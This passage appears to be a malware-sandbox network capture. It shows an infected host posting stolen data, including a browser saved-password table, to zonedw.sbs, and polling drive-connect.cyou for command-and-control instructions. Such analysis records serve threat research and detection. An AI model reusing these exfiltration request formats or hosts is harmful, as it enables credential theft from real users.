                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VAS26F37QIEUAAI5FUASCont
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                65192.168.2.450456116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CTRQ9ZCBA1N7QQQI5XT0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 55081
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------CTRQ9ZCBA1N7QQQI5XT0Content-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------CTRQ9ZCBA1N7QQQI5XT0Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------CTRQ9ZCBA1N7QQQI5XT0Cont
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:01 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                66192.168.2.450458172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:02 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 81
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:55:02 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=6AB8C0C3488F994123D904AF30EFEBBC
                                                                                                                                                                                                                                                2024-12-13 12:55:04 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=nub5qcfm0s840casdfn4138dtt; expires=Tue, 08-Apr-2025 06:41:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0KvAVAmfH%2BaKBC18WlQdJTE2OPeOVJ2%2BnUw7v7Gq96PsnACJPp1eZOmj97HqTjlMujnhAO28BZ666g%2BnmWeItxrrB8L6%2FJlGJjMDHv4EyqRt4TturLtyWl%2BMdmI1v3NKbYCR68%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161b335c7572a1-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1976&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=983&delivery_rate=1419543&cwnd=194&unsent_bytes=0&cid=d4ff09d4efd81664&ts=1897&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:55:04 UTC54INData Raw: 33 30 0d 0a 46 54 33 6d 62 57 36 6e 7a 6c 74 51 36 56 41 7a 4e 53 55 4d 37 74 45 6f 44 56 6c 67 7a 32 6c 58 6f 4f 4d 45 77 4f 6c 7a 6c 4d 35 4f 59 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 30FT3mbW6nzltQ6VAzNSUM7tEoDVlgz2lXoOMEwOlzlM5OYA==
                                                                                                                                                                                                                                                2024-12-13 12:55:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                67192.168.2.450459116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:03 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9HVSRI5X4OZM7YCTJWLF
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
